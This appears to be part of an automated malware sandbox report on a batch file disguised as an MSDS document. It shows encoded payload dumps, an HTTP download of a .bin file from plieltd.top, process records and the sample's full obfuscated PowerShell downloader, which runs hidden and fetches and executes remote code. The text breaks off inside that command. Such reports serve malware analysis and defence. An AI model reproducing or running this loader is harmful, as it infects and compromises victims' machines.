    Last-Modified: Tue, 22 Oct 2024 04:58:41 GMT
    ETag: "78bf4-625099f828847"
    Accept-Ranges: bytes
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iegvhFsMy1peo4qco0NBOBacs00OFOngdecYRpWFH1nvK1KPSd98p6kVTDbTn1X7tLy9nqP6drqnb%2FWNrUUwQjO2tdMI4JoR1XW8x23Mqz7B1X02pdxBrE5pdydE4w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=0; includeSubDomains; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 8d67d6524d6e2e63-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1152&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=787&delivery_rate=2511708&cwnd=251&unsent_bytes=0&cid=9d57069326efec64&ts=517&x=0"
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 63 51 47 62 36 77 4a 56 73 37 73 30 50 78 63 41 63 51 47 62 36 77 4a 4a 77 41 4e 63 4a 41 54 72 41 73 73 57 63 51 47 62 75 5a 78 75 44 30 4c 72 41 67 57 74 36 77 4b 59 45 34 48 70 4c 4d 6b 48 35 58 45 42 6d 33 45 42 6d 34 48 42 6b 46 72 34 6f 75 73 43 56 4c 39 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 53 42 41 35 48 58 45 42 6d 2b 73 43 47 2b 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 6e 63 4b 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 57 48 4f 42 2b 59 78 44 42 51 4a 38 7a 75 73 43 73 44 72 72 41 68 61 77 69 30 51 6b 42 4f 73 43 4f 75 72 72 41 6d 48 56 69 63 4e 78 41 5a 76 72 41 6a 49 67 67 63 4f 37 31 4d 4d 41 36 77 4a 54 49 48 45 42 6d 37 70 46 4f 38 38 6f 36 77 4b 47 6a 58 45 42 6d 34 48
    Data Ascii: cQGb6wJVs7s0PxcAcQGb6wJJwANcJATrAssWcQGbuZxuD0LrAgWt6wKYE4HpLMkH5XEBm3EBm4HBkFr4ousCVL9xAZtxAZtxAZu6SBA5HXEBm+sCG+txAZtxAZsxynEBm+sCncKJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCWHOB+YxDBQJ8zusCsDrrAhawi0QkBOsCOurrAmHVicNxAZvrAjIggcO71MMA6wJTIHEBm7pFO88o6wKGjXEBm4H
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 2b 6c 4d 67 66 33 37 44 44 79 51 42 49 52 58 72 30 48 6c 6d 55 64 61 2f 42 54 43 71 67 47 64 52 34 76 6d 76 6b 4a 69 4f 55 63 66 35 76 30 5a 6c 4f 75 63 6b 6b 56 69 41 52 53 45 4d 59 6f 41 53 47 41 42 6e 53 31 6a 2f 69 69 50 59 67 47 64 72 31 6f 65 6d 45 66 6a 66 4f 6d 6d 74 41 47 64 53 4f 2b 46 51 45 64 69 69 42 68 33 59 77 47 64 49 5a 58 41 30 68 78 62 79 31 6f 44 52 67 6c 64 30 73 41 57 5a 63 59 57 4a 5a 57 54 54 48 54 34 78 68 59 6c 6c 53 4f 77 6b 41 4b 78 6f 42 67 63 41 30 59 4a 44 64 48 62 45 2f 57 38 75 45 66 6c 72 33 48 75 6d 55 66 72 58 49 57 75 67 67 47 64 52 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: +lMgf37DDyQBIRXr0HlmUda/BTCqgGdR4vmvkJiOUcf5v0ZlOuckkViARSEMYoASGABnS1j/iiPYgGdr1oemEfjfOmmtAGdSO+FQEdiiBh3YwGdIZXA0hxby1oDRgld0sAWZcYWJZWTTHT4xhYllSOwkAKxoBgcA0YJDdHbE/W8uEflr3HumUfrXIWuggGdRwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 31 48 59 67 36 64 6d 4f 38 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 73 73 56 63 72 68 52 4a 63 73 55 79 41 4d 7a 76 68 5a 31 48 59 72 74 55 78 6a 58 50 64 62 4f 39 42 5a 33 4f 35 79 47 63 52 32 49 4f 6e 56 66 6f 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 72 58 70 54 64 55 74 6c 65 4b 72 6a 47 2b 37 77 44 4f 53 52 71 44 55 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 53 4c 56 62 64 47 33 44 75 75 45 75 6b 56 69 41 63 76 35 64 2b 71 79 70 65 50 33 75 69 77 64 69 42 79 70 53 63 62 58 46 2b 50 33 6d 65 31 6e 47 68 52 42 32 4a 42 44 73 73 6c 4d 70 75 6c 6a 41
    Data Ascii: 1HYg6dmO8BnUdiAZ1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdissVcrhRJcsUyAMzvhZ1HYrtUxjXPdbO9BZ3O5yGcR2IOnVfoAZ1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdiAZ1HYrXpTdUtleKrjG+7wDOSRqDUnUdiAZ1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdiASLVbdG3DuuEukViAcv5d+qypeP3uiwdiBypScbXF+P3me1nGhRB2JBDsslMpuljA
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 4c 48 4b 7a 4c 63 56 73 46 34 38 4a 6d 46 63 56 46 48 4c 54 62 36 31 70 57 4e 4a 30 55 6f 57 73 66 41 48 36 55 64 59 6c 63 41 6e 30 6a 79 67 50 36 64 2f 58 55 47 46 30 7a 4e 55 43 6e 63 2b 41 32 78 74 46 51 71 67 69 53 39 52 30 31 36 4c 71 73 64 32 63 4f 68 73 68 46 42 59 45 51 52 73 51 50 57 36 4a 59 65 70 6a 41 58 54 6c 67 47 5a 54 43 72 78 7a 6a 38 75 6f 59 4a 75 44 50 2f 5a 2b 71 76 34 6a 6a 36 35 53 30 6c 62 51 63 74 5a 61 34 74 31 34 7a 6e 52 53 6d 59 78 41 41 77 70 4e 79 69 4b 64 51 55 56 5a 44 75 43 7a 33 47 6b 4c 35 62 31 2f 4d 57 53 36 6e 63 34 4f 68 62 77 2b 72 31 50 2f 6c 55 64 44 49 34 62 51 49 61 4e 77 47 4f 43 65 4a 6f 43 56 4d 2f 6f 56 66 48 75 4e 38 31 62 43 4d 41 5a 31 49 35 74 71 6f 52 57 4a 62 7a 73 7a 2f 61 35 39 48 59 76 4b 53 67 46
    Data Ascii: LHKzLcVsF48JmFcVFHLTb61pWNJ0UoWsfAH6UdYlcAn0jygP6d/XUGF0zNUCnc+A2xtFQqgiS9R016Lqsd2cOhshFBYEQRsQPW6JYepjAXTlgGZTCrxzj8uoYJuDP/Z+qv4jj65S0lbQctZa4t14znRSmYxAAwpNyiKdQUVZDuCz3GkL5b1/MWS6nc4Ohbw+r1P/lUdDI4bQIaNwGOCeJoCVM/oVfHuN81bCMAZ1I5tqoRWJbzsz/a59HYvKSgF
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 45 56 37 32 52 35 67 47 39 5a 65 45 42 46 66 47 5a 69 58 38 79 75 49 69 48 47 74 47 41 2b 74 61 32 6c 59 69 39 67 48 66 70 4d 61 56 6b 71 59 77 36 49 42 79 39 35 79 70 4c 73 35 74 63 55 77 75 6f 4b 74 7a 76 4a 63 63 44 65 44 55 45 78 67 74 67 42 77 71 41 47 59 6a 44 72 38 68 37 49 32 76 56 50 59 79 37 77 31 6d 35 34 57 62 6f 4c 4b 32 38 39 58 73 77 30 7a 35 4f 2b 55 39 67 4c 46 6a 52 76 2f 31 63 71 35 50 50 42 76 63 54 68 42 78 77 49 71 6d 55 47 45 48 2b 78 38 49 31 4b 74 53 59 55 71 5a 75 67 78 59 35 74 31 7a 57 6b 6e 4b 31 6f 72 43 66 4b 70 79 66 35 41 59 35 79 79 59 68 31 4d 6e 42 62 4a 51 4a 73 61 49 33 34 68 5a 75 49 42 33 48 7a 6b 79 66 4d 35 59 76 6f 7a 31 37 6e 36 78 78 58 79 6c 74 4a 4b 43 38 54 4d 72 50 48 56 62 58 2f 78 61 77 31 51 6c 37 79 36
    Data Ascii: EV72R5gG9ZeEBFfGZiX8yuIiHGtGA+ta2lYi9gHfpMaVkqYw6IBy95ypLs5tcUwuoKtzvJccDeDUExgtgBwqAGYjDr8h7I2vVPYy7w1m54WboLK289Xsw0z5O+U9gLFjRv/1cq5PPBvcThBxwIqmUGEH+x8I1KtSYUqZugxY5t1zWknK1orCfKpyf5AY5yyYh1MnBbJQJsaI34hZuIB3HzkyfM5Yvoz17n6xxXyltJKC8TMrPHVbX/xaw1Ql7y6
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 76 61 48 6d 57 57 77 33 77 41 53 39 38 6a 56 73 62 4c 5a 36 69 44 76 6f 45 6d 61 76 4f 30 56 58 70 34 6d 6d 42 34 68 57 39 6e 46 66 35 78 65 48 4b 6d 44 6b 4b 75 4f 34 2f 64 76 37 31 53 34 48 49 45 69 70 36 4e 48 72 68 48 4f 76 44 7a 50 4e 7a 6c 68 6b 50 4e 51 39 2b 50 73 37 4c 6d 46 50 49 35 37 7a 31 39 56 39 56 52 4c 6b 76 4a 4b 54 42 44 51 36 4b 39 34 4a 38 58 65 46 46 59 42 73 49 44 6e 70 4a 78 48 59 6a 36 4e 6a 32 2f 4e 4b 65 47 43 55 30 6e 30 73 2f 4b 38 34 68 62 72 74 6c 67 2f 2f 75 64 2f 58 39 62 58 69 56 5a 47 79 4b 32 32 34 4f 55 66 4b 4c 41 68 72 76 4e 61 50 69 54 71 55 79 65 64 63 4c 47 6e 78 71 44 70 46 35 65 4a 67 46 39 35 41 58 35 45 45 50 36 49 65 6b 35 31 6e 4b 57 46 48 43 47 56 79 35 47 34 75 45 4d 39 73 46 70 61 57 42 67 6c 79 50 74 52
    Data Ascii: vaHmWWw3wAS98jVsbLZ6iDvoEmavO0VXp4mmB4hW9nFf5xeHKmDkKuO4/dv71S4HIEip6NHrhHOvDzPNzlhkPNQ9+Ps7LmFPI57z19V9VRLkvJKTBDQ6K94J8XeFFYBsIDnpJxHYj6Nj2/NKeGCU0n0s/K84hbrtlg//ud/X9bXiVZGyK224OUfKLAhrvNaPiTqUyedcLGnxqDpF5eJgF95AX5EEP6Iek51nKWFHCGVy5G4uEM9sFpaWBglyPtR
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 39 72 6e 71 35 6e 55 6a 4b 48 63 47 71 43 43 6f 47 35 72 6b 4f 5a 49 7a 30 78 6a 6c 67 6d 6d 66 51 2f 2b 68 36 6c 4d 2f 68 31 2f 61 33 41 34 2f 62 58 44 51 6b 64 6b 6f 42 62 67 70 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 45 7a 58 46 79 64 50 50 41 6c 46 7a 77 4a 47 77 53 78 4e 39 36 6f 58 73 52 68 49 77 37 51 49 31 63 6a 39 51 34 45 37 4d 61 55 6f 5a 41 54 72 6f 42 72 6b 6c 73 6c 2b 38 61 4d 78 73 6f 79 75 56 45 42 7a 6f 49 49 72 64 70 61 32 4f 31 72 67 4a 72 48 76 58 42 71 54 6a 4d 64 76 36 6b 30 48 31 48 75 6f 66 37 54 4b 4a 63 4c 33 47 6c 69 6a 43 45 4f 33 50 64 4b 4e 57 2b 6f 57 51 6c 57 59 78 38 32 73 46 6b 38 4e 76 75 54 72 35 32 77 6f 63 47 45 67 45 56 5a 70 62 6f 38 67 47 70 41 33
    Data Ascii: 9rnq5nUjKHcGqCCoG5rkOZIz0xjlgmmfQ/+h6lM/h1/a3A4/bXDQkdkoBbgp1HYgGdR2IBnUdiAZ1HYgGdR2IBnUdiAZ1HYgEzXFydPPAlFzwJGwSxN96oXsRhIw7QI1cj9Q4E7MaUoZATroBrklsl+8aMxsoyuVEBzoIIrdpa2O1rgJrHvXBqTjMdv6k0H1Huof7TKJcL3GlijCEO3PdKNW+oWQlWYx82sFk8NvuTr52wocGEgEVZpbo8gGpA3
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 59 63 76 41 4c 41 55 6a 76 73 33 59 42 78 57 33 6e 76 47 5a 38 52 57 65 6b 6c 7a 30 34 56 68 2f 6a 4e 62 6e 79 57 78 38 52 78 6b 34 6c 54 50 6b 69 6c 38 76 35 77 61 66 31 47 65 50 76 4e 67 45 33 53 78 79 70 31 32 2f 59 5a 75 50 76 4a 4c 61 75 38 78 52 52 76 4b 31 4e 69 65 6b 4d 61 41 52 51 79 39 76 46 49 30 6d 58 4f 4a 59 36 62 55 2b 50 44 4f 70 43 30 4f 6e 4a 4b 4c 36 54 4c 34 56 67 36 62 48 53 42 65 71 66 74 68 4a 66 79 76 6a 4e 68 61 53 41 34 2f 62 65 74 37 71 6f 48 4b 69 63 70 61 45 73 34 2f 5a 6f 69 73 76 31 48 49 43 48 2f 32 39 50 4d 4a 30 55 70 57 73 37 41 48 2b 68 63 35 58 49 58 52 30 4f 4f 5a 58 4c 43 34 45 50 45 33 6d 4b 68 70 59 5a 42 63 44 2f 64 76 34 51 37 6c 2f 61 74 66 50 5a 55 52 69 72 61 37 6a 4f 78 46 37 37 45 4d 76 34 48 4a 49 35 44 65
    Data Ascii: YcvALAUjvs3YBxW3nvGZ8RWeklz04Vh/jNbnyWx8Rxk4lTPkil8v5waf1GePvNgE3Sxyp12/YZuPvJLau8xRRvK1NiekMaARQy9vFI0mXOJY6bU+PDOpC0OnJKL6TL4Vg6bHSBeqfthJfyvjNhaSA4/bet7qoHKicpaEs4/Zoisv1HICH/29PMJ0UpWs7AH+hc5XIXR0OOZXLC4EPE3mKhpYZBcD/dv4Q7l/atfPZURira7jOxF77EMv4HJI5De
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 55 67 36 55 30 52 71 4a 6e 42 6a 68 6e 37 52 46 57 72 35 57 55 67 78 39 69 35 61 4a 36 32 6b 63 4a 39 6f 39 48 48 4e 47 6c 76 53 63 44 6c 4d 6e 46 74 6a 32 6f 63 61 51 75 34 44 58 32 6f 42 76 46 4d 72 69 6f 73 61 67 53 57 77 38 4a 6c 45 42 7a 6f 49 49 6a 64 72 6e 79 65 78 4e 52 53 31 4d 37 77 69 6d 34 6a 49 79 6e 78 39 32 35 39 4a 59 61 45 6d 68 56 7a 44 44 68 55 77 76 6e 36 74 35 33 34 78 6f 4c 37 66 51 35 57 45 77 75 72 51 54 45 4d 67 35 52 52 2f 6e 79 4d 66 47 56 69 58 32 34 6f 75 4f 55 58 48 66 49 69 67 66 79 6f 6c 75 74 43 64 46 5a 48 6a 4c 52 75 34 30 50 36 2f 6b 58 48 59 43 59 71 75 30 34 66 46 53 6a 68 34 75 70 4f 7a 4a 48 6a 59 30 37 47 4c 72 62 51 42 55 67 47 49 42 6e 55 64 69 41 5a 31 48 59 67 47 64 52 32 49 42 6e 55 64 69 41 5a 31 48 59 67 47
    Data Ascii: Ug6U0RqJnBjhn7RFWr5WUgx9i5aJ62kcJ9o9HHNGlvScDlMnFtj2ocaQu4DX2oBvFMriosagSWw8JlEBzoIIjdrnyexNRS1M7wim4jIynx9259JYaEmhVzDDhUwvn6t534xoL7fQ5WEwurQTEMg5RR/nyMfGViX24ouOUXHfIigfyolutCdFZHjLRu40P6/kXHYCYqu04fFSjh4upOzJHjY07GLrbQBUgGIBnUdiAZ1HYgGdR2IBnUdiAZ1HYgG
2024-10-22 07:40:05 UTC | 1369 | IN | Data Raw: 48 73 5a 67 50 30 6c 6a 74 52 6e 6f 71 42 70 30 2b 52 69 61 39 6f 6a 69 32 2f 48 75 67 72 55 58 39 30 51 33 54 37 6c 61 31 43 41 61 76 68 48 75 2b 37 47 6a 64 72 6c 62 58 4f 41 61 75 38 4c 61 71 33 4f 62 63 36 61 44 63 63 68 66 48 4e 61 57 77 6b 32 65 32 68 73 4a 34 46 66 63 50 56 4f 34 79 76 51 75 75 72 7a 4f 42 39 65 56 76 59 58 37 6d 30 68 36 62 63 6d 47 4f 4d 35 64 37 72 36 54 65 6a 78 4d 62 70 42 49 71 37 71 48 4c 51 33 6a 4f 44 71 34 38 4b 76 35 4e 63 48 48 49 51 77 38 68 36 68 34 2b 71 46 36 34 67 79 46 48 51 57 33 38 61 51 48 57 57 33 52 53 4a 45 67 36 30 32 48 2f 65 4a 70 45 66 71 71 4d 58 68 76 70 58 35 59 75 64 46 63 44 49 33 2b 73 58 6e 66 35 76 4a 4a 51 34 42 54 67 46 2f 4e 2f 4b 4b 71 64 38 53 57 68 30 2f 5a 72 6d 53 77 6a 6a 2b 59 72 68 74
    Data Ascii: HsZgP0ljtRnoqBp0+Ria9oji2/HugrUX90Q3T7la1CAavhHu+7GjdrlbXOAau8Laq3Obc6aDcchfHNaWwk2e2hsJ4FfcPVO4yvQuurzOB9eVvYX7m0h6bcmGOM5d7r6TejxMbpBIq7qHLQ3jODq48Kv5NcHHIQw8h6h4+qF64gyFHQW38aQHWW3RSJEg602H/eJpEfqqMXhvpX5YudFcDI3+sXnf5vJJQ4BTgF/N/KKqd8SWh0/ZrmSwjj+Yrht


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.649846104.21.56.1894432996C:\Windows\SysWOW64\msiexec.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-22 07:40:35 UTC171OUTGET /dUEhUdoBD66.bin HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                  Host: plieltd.top
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-10-22 07:40:36 UTC | 977 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Tue, 22 Oct 2024 07:40:36 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 494656
                                                                                                  Connection: close
                                                                                                  Last-Modified: Tue, 22 Oct 2024 04:42:34 GMT
                                                                                                  ETag: "78c40-6250965e7164a"
                                                                                                  Cache-Control: max-age=14400
                                                                                                  CF-Cache-Status: MISS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7PO2qVJoTm6%2FNqz7Y45hHmWHs0cRlQOdsN2puaPnAZrAmY9P1sYElfwR7KMin3PfXdQgJOjLB2OLDNW3orI6NGqQKK8FU9GpBvhKj0mzmABD9dJq%2FDHkfzu2nnOSrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8d67d713cbef4754-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1078&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=809&delivery_rate=2644748&cwnd=247&unsent_bytes=0&cid=5e2e51dc1d04a6ef&ts=910&x=0"



                                                                                                  Target ID:0
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.bat" "
                                                                                                  Imagebase:0x7ff7bca70000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff66e660000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:03:40:01
                                                                                                  Start date:22/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar aAmatlStol:caviuacrodSlipgVarsI 
atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aHopllMotoiRetosSenseStard emo.ForeHCo,ae OpgaCha dSelseAflarTomjsSu.b[ Bip$ PreH madaDecriF odrReevsIzbatWalky Fonl FoliIndesEne tJac.sKorr]Akan=Dest$Ju eLFo eiR fov de eUnp lnyt y .kr ');$Netvrkslsningens=Fyrsternes ' Nor$SadhI PinmKa,smUssioStr,rPhaltPrinaSymmlBialicratsFi.eeAdrodTole. Ro.Dnsk,o DecwprotnGuailSengoT,kka u,bd BolFM noiR velBir e Me (Egyp$ Af.HexpeyTorepUdgae U,sridion ecoiPe ncScen,Ne.r$,ranBDolkaMaplrAutetGri.hWouloPhenl,mbloo rnmUncoeFllea w snnaal)tam. 
';$Bartholomean=$Ferias5;kaldedes (Fyrsternes 'Hier$ Ti gAll L tikOConvBTingaSkyplUnde: MisFTevaABomuNBehaFUnc aChokR WraoAce,n Bo AFlygd B.seR,mp1Gaml2 ,en8u io= Fun( Reot Fr,EAaresUn eT Re -SporPBrugaBun t Or,H.hum Fabr$SamfBPrseaPlisrVatit .mbHsupeo monL allOtredmSlaue Dela KarnKkke)Refi ');while (!$Fanfaronade128) {kaldedes (Fyrsternes 'Omga$ HungTsarl DenoRevebComiaReenlKrig:PalaOTenddSn oiUncosTurke TensDisktSy d=Mang$PendtFl trUnthu laneUdra ') ;kaldedes $Netvrkslsningens;kaldedes (Fyrsternes 'StegS Utnt claaQuadRQuadTOver-SabbSEverl Scaeres,EendeP Emm Vin4tige ');kaldedes (Fyrsternes 'Rygz$,rbegDo,elE poo Civb Sp a FinlBran:Hir.fnaivA Tu,n resFMethak adrCharOTudeNGisnAAcridDullEFire1 .kk2 Son8Apol= er(K.ngtBolveSproSKlipTC ck-.aanP LinAbraitGrusHaphy Tvan$f siB KonaH,tcRInteTExpuHLsenOTa.olVandoG.unM NagEDe cA PreNPerg)Cast ') ;kaldedes (Fyrsternes 'Stel$Su.egDebaL ChioD,ssBLionADiselRoya:Phy i TelNTeetDpunkeEft,NModtr ReaiS,ufGBriksGardF Reml SteY MalV ,inNNonciM llNDruiGTo aeRangRtabuN RedeV,de=Ha m$ En gInsplSenaOKanebEnj,ANonpl gro:EcottNaturOph.uNon ISmurnDyrpgA lv+I am+Pref%A,ch$.eskUAposD .roGBrneiP,ocfAdelTMesosDivibMet E UndhsystOReedv erEFortTAf.is Ups.D ggCTu eOBilbu MicN KryTT ta ') ;$Hypernic=$Udgiftsbehovets[$Indenrigsflyvningerne];}$Begravelsesaftale=340812;$Kuverts=30123;kaldedes (Fyrsternes 'Arbe$ SoeGS.bflStjiONonsB Su aUdstlGui : Bu.SIndvoCervLBilldGaloE dprHea i StaSQui TCholE HalNkachSanst J te=Acti ElogSpeceaarbtFort- E tCAfvaOAgniNPoohTCouneHumiNFlastWi,d Lovr$FlskbShipA O grBriltBelgHRenoOAc dlKultoHundM SkaeramiAVul nK.lo ');kaldedes (Fyrsternes 'Fred$w ndg Re,lVirgoBonbbUnbuaUnmulPr k:Or fSFagba ,admfranmPl ueRivenBa,ifRe.eaflakl Un.dfi neBattnFamieO kesAppe Afm= Tru Tilk[ GtsSG upyLysesChantCutleCircm P.d.Piz CKonooSnornLigkvCo se,iblrTeknt,eba]Meka: ydr: s lFKederDagko Senm O oBCr eaSubfs reveIn i6Revu4I feS FratCounrRavniFlaxnUnsmgLuxu(Bibe$LancSIncoo.virlOverdCause Decr Be iFlaksVltetTaabetilenMaltsChol)Fjer ');kaldedes 
